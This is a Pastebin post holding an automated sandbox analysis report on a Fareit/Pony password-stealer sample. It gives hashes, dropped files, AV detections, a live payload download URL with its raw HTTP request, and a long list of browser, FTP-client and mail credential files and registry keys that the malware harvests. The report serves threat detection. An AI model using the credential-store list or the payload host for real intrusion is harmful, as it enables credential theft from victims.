Advertisement
paladin316

Fareit_600290989d7810da164abc50b9996801_exe_2019-08-18_14_40.txt

Aug 18th, 2019
1,522
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.16 KB | None | 0 0
  1.  
  2. * MalFamily: "Fareit"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_600290989d7810da164abc50b9996801.exe"
  7. * File Size: 92672
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "2932fc5a8f05d1a863283c5329d139e447c556a2117c471af92c0232a12275f2"
  10. * MD5: "600290989d7810da164abc50b9996801"
  11. * SHA1: "d0cac69604098796ea3589d81a5e2b616e094f76"
  12. * SHA512: "218067e61f55f18c677c6737b655b7a1b737781253463360833b7c53da437cb3a4e680292a8ecbb222938d56a39100ffe3d9a20e8747c5b54ba027b2f33dcea6"
  13. * CRC32: "56E6BC64"
  14. * SSDEEP: "1536:fICsMEtHqTXM/r3cmN77FZctfKigljzyxb4ONKZ5TvoEA7kzmKx:ACs/hr3cmR7FZcNAVrONEADKx"
  15.  
  16. * Process Execution:
  17. "EhKeCN2DDdNim.exe",
  18. "6933296.exe",
  19. "cmd.exe",
  20. "cmd.exe"
  21.  
  22.  
  23. * Executed Commands:
  24. "\"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\"",
  25. "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe ",
  26. "\"C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat\" \"C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe\"",
  27. "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe\"",
  28. "\"C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat\" \"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\"",
  29. "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\""
  30.  
  31.  
  32. * Signatures Detected:
  33.  
  34. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  35. "Details":
  36.  
  37.  
  38. "Description": "Possible date expiration check, exits too soon after checking local time",
  39. "Details":
  40.  
  41. "process": "EhKeCN2DDdNim.exe, PID 424"
  42.  
  43.  
  44.  
  45.  
  46. "Description": "A process created a hidden window",
  47. "Details":
  48.  
  49. "Process": "EhKeCN2DDdNim.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat"
  50.  
  51.  
  52. "Process": "6933296.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat"
  53.  
  54.  
  55.  
  56.  
  57. "Description": "Drops a binary and executes it",
  58. "Details":
  59.  
  60. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe"
  61.  
  62.  
  63.  
  64.  
  65. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  66. "Details":
  67.  
  68. "http_version_old": "HTTP traffic uses version 1.0"
  69.  
  70.  
  71. "suspicious_request": "http://iosappdevelopmentindia.com/server/oscar.exe"
  72.  
  73.  
  74.  
  75.  
  76. "Description": "Performs some HTTP requests",
  77. "Details":
  78.  
  79. "url": "http://iosappdevelopmentindia.com/server/oscar.exe"
  80.  
  81.  
  82.  
  83.  
  84. "Description": "Uses Windows utilities for basic functionality",
  85. "Details":
  86.  
  87. "command": "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe\""
  88.  
  89.  
  90. "command": "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\""
  91.  
  92.  
  93.  
  94.  
  95. "Description": "Deletes its original binary from disk",
  96. "Details":
  97.  
  98.  
  99. "Description": "Steals private information from local Internet browsers",
  100. "Details":
  101.  
  102. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal"
  103.  
  104.  
  105. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  106.  
  107.  
  108. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal"
  109.  
  110.  
  111. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  112.  
  113.  
  114.  
  115.  
  116. "Description": "Exhibits behavior characteristic of Pony malware",
  117. "Details":
  118.  
  119. "C2": "http://iosappdevelopmentindia.com/server/oscar.exe"
  120.  
  121.  
  122.  
  123.  
  124. "Description": "Collects information about installed applications",
  125. "Details":
  126.  
  127. "Program": "Google Update Helper"
  128.  
  129.  
  130. "Program": "Microsoft Excel MUI 2013"
  131.  
  132.  
  133. "Program": "Microsoft Outlook MUI 2013"
  134.  
  135.  
  136.  
  137.  
  138. "Program": "Google Chrome"
  139.  
  140.  
  141. "Program": "Adobe Flash Player 29 NPAPI"
  142.  
  143.  
  144. "Program": "Adobe Flash Player 29 ActiveX"
  145.  
  146.  
  147. "Program": "Microsoft DCF MUI 2013"
  148.  
  149.  
  150. "Program": "Microsoft Access MUI 2013"
  151.  
  152.  
  153. "Program": "Microsoft Office Proofing Tools 2013 - English"
  154.  
  155.  
  156. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  157.  
  158.  
  159. "Program": "Microsoft Publisher MUI 2013"
  160.  
  161.  
  162. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  163.  
  164.  
  165. "Program": "Microsoft Office Shared MUI 2013"
  166.  
  167.  
  168. "Program": "Microsoft Office OSM MUI 2013"
  169.  
  170.  
  171. "Program": "Microsoft InfoPath MUI 2013"
  172.  
  173.  
  174. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  175.  
  176.  
  177. "Program": "Microsoft Word MUI 2013"
  178.  
  179.  
  180. "Program": "Microsoft Groove MUI 2013"
  181.  
  182.  
  183.  
  184.  
  185. "Program": "Microsoft Access Setup Metadata MUI 2013"
  186.  
  187.  
  188. "Program": "Microsoft Office OSM UX MUI 2013"
  189.  
  190.  
  191. "Program": "Microsoft PowerPoint MUI 2013"
  192.  
  193.  
  194. "Program": "Microsoft Office Professional Plus 2013"
  195.  
  196.  
  197. "Program": "Adobe Refresh Manager"
  198.  
  199.  
  200. "Program": "Microsoft Office Proofing 2013"
  201.  
  202.  
  203. "Program": "Microsoft Lync MUI 2013"
  204.  
  205.  
  206.  
  207.  
  208. "Program": "Microsoft OneNote MUI 2013"
  209.  
  210.  
  211.  
  212.  
  213. "Description": "CAPE detected the Fareit malware family",
  214. "Details":
  215.  
  216.  
  217. "Description": "File has been identified by 56 Antiviruses on VirusTotal as malicious",
  218. "Details":
  219.  
  220. "MicroWorld-eScan": "Generic.StealerA.BE30A4FF"
  221.  
  222.  
  223. "CAT-QuickHeal": "Trojanpws.Tepfer.20303"
  224.  
  225.  
  226. "McAfee": "PWS-Zbot.gen.ate"
  227.  
  228.  
  229. "Cylance": "Unsafe"
  230.  
  231.  
  232. "CrowdStrike": "win/malicious_confidence_100% (W)"
  233.  
  234.  
  235. "BitDefender": "Generic.StealerA.BE30A4FF"
  236.  
  237.  
  238. "K7GW": "Password-Stealer ( 0040f4f51 )"
  239.  
  240.  
  241. "K7AntiVirus": "Password-Stealer ( 0040f4f51 )"
  242.  
  243.  
  244. "Arcabit": "Generic.StealerA.BE30A4FF"
  245.  
  246.  
  247. "Baidu": "Win32.Trojan-PSW.Fareit.a"
  248.  
  249.  
  250. "F-Prot": "W32/Bloop.A.gen!Eldorado"
  251.  
  252.  
  253. "Symantec": "Infostealer!im"
  254.  
  255.  
  256. "ESET-NOD32": "a variant of Win32/PSW.Fareit.A"
  257.  
  258.  
  259. "APEX": "Malicious"
  260.  
  261.  
  262. "Avast": "Sf:Crypt-AS Trj"
  263.  
  264.  
  265. "ClamAV": "Win.Trojan.Fareit-403"
  266.  
  267.  
  268. "GData": "Win32.Trojan-Stealer.Zbot.AB"
  269.  
  270.  
  271. "Kaspersky": "Trojan-PSW.Win32.Tepfer.gen"
  272.  
  273.  
  274. "Alibaba": "TrojanPSW:Win32/Tepfer.d5f49d23"
  275.  
  276.  
  277. "NANO-Antivirus": "Trojan.Win32.Siggen.evgeyh"
  278.  
  279.  
  280. "Paloalto": "generic.ml"
  281.  
  282.  
  283. "AegisLab": "Trojan.Win32.Generic.mtwx"
  284.  
  285.  
  286. "Ad-Aware": "Generic.StealerA.BE30A4FF"
  287.  
  288.  
  289. "Sophos": "Mal/Pony-A"
  290.  
  291.  
  292. "Comodo": "TrojWare.Win32.PWS.Fareit.GS@5t8zib"
  293.  
  294.  
  295. "F-Secure": "Trojan.TR/PSW.Fareit.iloen"
  296.  
  297.  
  298. "DrWeb": "Trojan.PWS.Stealer.1932"
  299.  
  300.  
  301. "Invincea": "heuristic"
  302.  
  303.  
  304. "McAfee-GW-Edition": "BehavesLike.Win32.PWSZbot.nh"
  305.  
  306.  
  307. "Trapmine": "malicious.high.ml.score"
  308.  
  309.  
  310. "FireEye": "Generic.mg.600290989d7810da"
  311.  
  312.  
  313. "Emsisoft": "Generic.StealerA.BE30A4FF (B)"
  314.  
  315.  
  316. "SentinelOne": "DFI - Malicious PE"
  317.  
  318.  
  319. "Cyren": "W32/Bloop.A.gen!Eldorado"
  320.  
  321.  
  322. "Jiangmin": "Trojan/PSW.Tepfer.btny"
  323.  
  324.  
  325. "eGambit": "Unsafe.AI_Score_99%"
  326.  
  327.  
  328. "Avira": "TR/PSW.Fareit.iloen"
  329.  
  330.  
  331. "Antiy-AVL": "TrojanPSW/Win32.Tepfer"
  332.  
  333.  
  334. "Microsoft": "PWS:Win32/Fareit"
  335.  
  336.  
  337. "Endgame": "malicious (high confidence)"
  338.  
  339.  
  340. "ZoneAlarm": "Trojan-PSW.Win32.Tepfer.gen"
  341.  
  342.  
  343. "AhnLab-V3": "Trojan/Win32.Tepfer.R93111"
  344.  
  345.  
  346. "Acronis": "suspicious"
  347.  
  348.  
  349. "VBA32": "SScope.Malware-Cryptor.Ponik"
  350.  
  351.  
  352. "ALYac": "Generic.StealerA.BE30A4FF"
  353.  
  354.  
  355. "MAX": "malware (ai score=100)"
  356.  
  357.  
  358. "Malwarebytes": "Spyware.Pony"
  359.  
  360.  
  361. "TrendMicro-HouseCall": "BKDR_PONY.SM"
  362.  
  363.  
  364. "Rising": "Stealer.Fareit!1.B777 (CLASSIC)"
  365.  
  366.  
  367. "Yandex": "Trojan.PonyPass.Gen.LH"
  368.  
  369.  
  370. "Ikarus": "Trojan-Spy.Fareit"
  371.  
  372.  
  373. "Fortinet": "W32/Agent.NTM!tr"
  374.  
  375.  
  376. "AVG": "Sf:Crypt-AS Trj"
  377.  
  378.  
  379. "Cybereason": "malicious.89d781"
  380.  
  381.  
  382. "Panda": "Trj/Genetic.gen"
  383.  
  384.  
  385. "Qihoo-360": "Win32/Trojan.PSW.c13"
  386.  
  387.  
  388.  
  389.  
  390. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  391. "Details":
  392.  
  393. "target": "clamav:Win.Trojan.Fareit-403, sha256:2932fc5a8f05d1a863283c5329d139e447c556a2117c471af92c0232a12275f2, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  394.  
  395.  
  396. "dropped": "clamav:Win.Trojan.Fareit-403, sha256:e656a87f9ee91482ad7ff860d2c5898b1b4a2405af7d5b6026952a387c29813e , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  397.  
  398.  
  399.  
  400.  
  401. "Description": "Harvests credentials from local FTP client softwares",
  402. "Details":
  403.  
  404. "file": "C:\\Program Files (x86)\\CuteFTP\\sm.dat"
  405.  
  406.  
  407. "file": "C:\\Users\\user\\AppData\\Local\\CuteFTP\\sm.dat"
  408.  
  409.  
  410. "file": "C:\\Users\\user\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat"
  411.  
  412.  
  413. "file": "C:\\Users\\user\\AppData\\Roaming\\CuteFTP\\sm.dat"
  414.  
  415.  
  416. "file": "C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat"
  417.  
  418.  
  419. "file": "C:\\ProgramData\\CuteFTP\\sm.dat"
  420.  
  421.  
  422. "file": "C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat"
  423.  
  424.  
  425. "file": "C:\\Users\\user\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat"
  426.  
  427.  
  428. "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\4\\Sites.dat"
  429.  
  430.  
  431. "file": "C:\\ProgramData\\FlashFXP\\3\\Sites.dat"
  432.  
  433.  
  434. "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\3\\Sites.dat"
  435.  
  436.  
  437. "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\4\\Sites.dat"
  438.  
  439.  
  440. "file": "C:\\ProgramData\\FlashFXP\\4\\Sites.dat"
  441.  
  442.  
  443. "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\3\\Sites.dat"
  444.  
  445.  
  446. "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\3\\Quick.dat"
  447.  
  448.  
  449. "file": "C:\\ProgramData\\FlashFXP\\4\\Quick.dat"
  450.  
  451.  
  452. "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\4\\Quick.dat"
  453.  
  454.  
  455. "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\4\\Quick.dat"
  456.  
  457.  
  458. "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\3\\Quick.dat"
  459.  
  460.  
  461. "file": "C:\\ProgramData\\FlashFXP\\3\\Quick.dat"
  462.  
  463.  
  464. "file": "C:\\Users\\user\\AppData\\Local\\FileZilla\\sitemanager.xml"
  465.  
  466.  
  467. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  468.  
  469.  
  470. "file": "C:\\ProgramData\\FileZilla\\sitemanager.xml"
  471.  
  472.  
  473. "file": "C:\\ProgramData\\FileZilla\\recentservers.xml"
  474.  
  475.  
  476. "file": "C:\\Users\\user\\AppData\\Local\\FileZilla\\recentservers.xml"
  477.  
  478.  
  479. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  480.  
  481.  
  482. "file": "C:\\Users\\user\\AppData\\Local\\VanDyke\\Config\\Sessions\\*.*"
  483.  
  484.  
  485. "file": "C:\\Users\\user\\AppData\\Roaming\\VanDyke\\Config\\Sessions\\*.*"
  486.  
  487.  
  488. "file": "C:\\ProgramData\\VanDyke\\Config\\Sessions\\*.*"
  489.  
  490.  
  491. "file": "C:\\Users\\user\\AppData\\Roaming\\FTP Explorer\\*.*"
  492.  
  493.  
  494. "file": "C:\\Users\\user\\AppData\\Local\\FTP Explorer\\*.*"
  495.  
  496.  
  497. "file": "C:\\ProgramData\\FTP Explorer\\*.*"
  498.  
  499.  
  500. "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\*.*"
  501.  
  502.  
  503. "file": "C:\\Users\\user\\AppData\\Local\\SmartFTP\\*.*"
  504.  
  505.  
  506. "file": "C:\\ProgramData\\SmartFTP\\*.*"
  507.  
  508.  
  509. "file": "C:\\Users\\user\\AppData\\Roaming\\TurboFTP\\*.*"
  510.  
  511.  
  512. "file": "C:\\Users\\user\\AppData\\Local\\TurboFTP\\*.*"
  513.  
  514.  
  515. "file": "C:\\ProgramData\\TurboFTP\\*.*"
  516.  
  517.  
  518. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPRush\\*.*"
  519.  
  520.  
  521. "file": "C:\\Users\\user\\AppData\\Local\\FTPRush\\*.*"
  522.  
  523.  
  524. "file": "C:\\ProgramData\\FTPRush\\*.*"
  525.  
  526.  
  527. "file": "C:\\ProgramData\\LeapWare\\LeapFTP\\*.*"
  528.  
  529.  
  530. "file": "C:\\Users\\user\\AppData\\Local\\LeapWare\\LeapFTP\\*.*"
  531.  
  532.  
  533. "file": "C:\\Users\\user\\AppData\\Roaming\\LeapWare\\LeapFTP\\*.*"
  534.  
  535.  
  536. "file": "C:\\Users\\user\\AppData\\Local\\FTPGetter\\*.*"
  537.  
  538.  
  539. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\*.*"
  540.  
  541.  
  542. "file": "C:\\ProgramData\\FTPGetter\\*.*"
  543.  
  544.  
  545. "file": "C:\\Users\\user\\AppData\\Local\\Estsoft\\ALFTP\\*.*"
  546.  
  547.  
  548. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\*.*"
  549.  
  550.  
  551. "file": "C:\\ProgramData\\Estsoft\\ALFTP\\*.*"
  552.  
  553.  
  554. "file": "C:\\Program Files (x86)\\Common Files\\Ipswitch\\WS_FTP\\*.*"
  555.  
  556.  
  557. "key": "HKEY_CURRENT_USER\\Software\\Far Manager\\Plugins\\FTP\\Hosts"
  558.  
  559.  
  560. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  561.  
  562.  
  563. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  564.  
  565.  
  566. "key": "HKEY_CURRENT_USER\\Software\\Far\\SavedDialogHistory\\FTPHost"
  567.  
  568.  
  569. "key": "HKEY_CURRENT_USER\\Software\\Far2\\SavedDialogHistory\\FTPHost"
  570.  
  571.  
  572. "key": "HKEY_CURRENT_USER\\Software\\Far Manager\\SavedDialogHistory\\FTPHost"
  573.  
  574.  
  575. "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"
  576.  
  577.  
  578. "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"
  579.  
  580.  
  581. "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"
  582.  
  583.  
  584. "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"
  585.  
  586.  
  587. "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"
  588.  
  589.  
  590. "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"
  591.  
  592.  
  593. "key": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Windows Commander"
  594.  
  595.  
  596. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Windows Commander"
  597.  
  598.  
  599. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  600.  
  601.  
  602. "key": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Total Commander"
  603.  
  604.  
  605. "key": "HKEY_CURRENT_USER\\Software\\BPFTP\\Bullet Proof FTP\\Options"
  606.  
  607.  
  608. "key": "HKEY_CURRENT_USER\\Software\\BPFTP\\Bullet Proof FTP\\Main"
  609.  
  610.  
  611. "key": "HKEY_CURRENT_USER\\Software\\FileZilla"
  612.  
  613.  
  614. "key": "HKEY_LOCAL_MACHINE\\Software\\FileZilla"
  615.  
  616.  
  617. "key": "HKEY_CURRENT_USER\\Software\\FileZilla Client"
  618.  
  619.  
  620. "key": "HKEY_LOCAL_MACHINE\\Software\\FileZilla Client"
  621.  
  622.  
  623. "key": "HKEY_CURRENT_USER\\Software\\TurboFTP"
  624.  
  625.  
  626. "key": "HKEY_LOCAL_MACHINE\\Software\\TurboFTP"
  627.  
  628.  
  629. "key": "HKEY_CURRENT_USER\\Software\\Sota\\FFFTP\\Options"
  630.  
  631.  
  632. "key": "HKEY_CURRENT_USER\\Software\\Sota\\FFFTP"
  633.  
  634.  
  635. "key": "HKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites"
  636.  
  637.  
  638. "key": "HKEY_CURRENT_USER\\Software\\FTP Explorer\\FTP Explorer\\Workspace\\MFCToolBar-224"
  639.  
  640.  
  641. "key": "HKEY_CURRENT_USER\\Software\\FTP Explorer\\Profiles"
  642.  
  643.  
  644. "key": "HKEY_LOCAL_MACHINE\\Software\\FTPClient\\Sites"
  645.  
  646.  
  647. "key": "HKEY_CURRENT_USER\\Software\\FTPClient\\Sites"
  648.  
  649.  
  650. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  651.  
  652.  
  653. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Robo-FTP 3.7\\Scripts"
  654.  
  655.  
  656. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Robo-FTP 3.7\\FTPServers"
  657.  
  658.  
  659. "key": "HKEY_CURRENT_USER\\SOFTWARE\\Robo-FTP 3.7\\FTPServers"
  660.  
  661.  
  662. "key": "HKEY_CURRENT_USER\\SOFTWARE\\Robo-FTP 3.7\\Scripts"
  663.  
  664.  
  665. "key": "HKEY_CURRENT_USER\\Software\\MAS-Soft\\FTPInfo\\Setup"
  666.  
  667.  
  668. "key": "HKEY_LOCAL_MACHINE\\Software\\SoftX.org\\FTPClient\\Sites"
  669.  
  670.  
  671. "key": "HKEY_CURRENT_USER\\Software\\SoftX.org\\FTPClient\\Sites"
  672.  
  673.  
  674. "key": "HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client\\Main"
  675.  
  676.  
  677. "key": "HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client\\Options"
  678.  
  679.  
  680.  
  681.  
  682. "Description": "Harvests information related to installed mail clients",
  683. "Details":
  684.  
  685. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  686.  
  687.  
  688. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings"
  689.  
  690.  
  691. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
  692.  
  693.  
  694. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  695.  
  696.  
  697. "key": "HKEY_CURRENT_USER\\Identities\\0A258175-2D14-4D69-9955-E200F247250F\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  698.  
  699.  
  700.  
  701.  
  702. "Description": "Created network traffic indicative of malicious activity",
  703. "Details":
  704.  
  705. "signature": "ET TROJAN Fareit/Pony Downloader Checkin 3"
  706.  
  707.  
  708. "signature": "ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98"
  709.  
  710.  
  711. "signature": "ET TROJAN Pony DLL Download M2"
  712.  
  713.  
  714.  
  715.  
  716.  
  717. * Started Service:
  718.  
  719. * Mutexes:
  720. "Local\\_!MSFTHISTORY!_",
  721. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
  722. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
  723. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!"
  724.  
  725.  
  726. * Modified Files:
  727. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
  728. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
  729. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
  730. "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe",
  731. "\\??\\PIPE\\samr",
  732. "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat",
  733. "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat"
  734.  
  735.  
  736. * Deleted Files:
  737. "C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe",
  738. "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat",
  739. "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe",
  740. "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat"
  741.  
  742.  
  743. * Modified Registry Keys:
  744. "HKEY_CURRENT_USER\\Software\\WinRAR",
  745. "HKEY_CURRENT_USER\\Software\\WinRAR\\HWID",
  746. "HKEY_CURRENT_USER\\Software\\WinRAR\\649235066887F12B1074B4DDCD305C91"
  747.  
  748.  
  749. * Deleted Registry Keys:
  750.  
  751. * DNS Communications:
  752.  
  753. "type": "A",
  754. "request": "iosappdevelopmentindia.com",
  755. "answers":
  756.  
  757. "data": "192.185.117.254",
  758. "type": "A"
  759.  
  760.  
  761.  
  762.  
  763. "type": "A",
  764. "request": "nztnyavroi.ru.net",
  765. "answers":
  766.  
  767.  
  768.  
  769. * Domains:
  770.  
  771. "ip": "",
  772. "domain": "nztnyavroi.ru.net"
  773.  
  774.  
  775. "ip": "192.185.117.254",
  776. "domain": "iosappdevelopmentindia.com"
  777.  
  778.  
  779.  
  780. * Network Communication - ICMP:
  781.  
  782. * Network Communication - HTTP:
  783.  
  784. "count": 1,
  785. "body": "",
  786. "uri": "http://iosappdevelopmentindia.com/server/oscar.exe",
  787. "user-agent": "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
  788. "method": "GET",
  789. "host": "iosappdevelopmentindia.com",
  790. "version": "1.0",
  791. "path": "/server/oscar.exe",
  792. "data": "GET /server/oscar.exe HTTP/1.0\r\nHost: iosappdevelopmentindia.com\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n",
  793. "port": 80
  794.  
  795.  
  796.  
  797. * Network Communication - SMTP:
  798.  
  799. * Network Communication - Hosts:
  800.  
  801. "country_name": "United States",
  802. "ip": "192.185.117.254",
  803. "inaddrarpa": "",
  804. "hostname": "iosappdevelopmentindia.com"
  805.  
  806.  
  807.  
  808. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement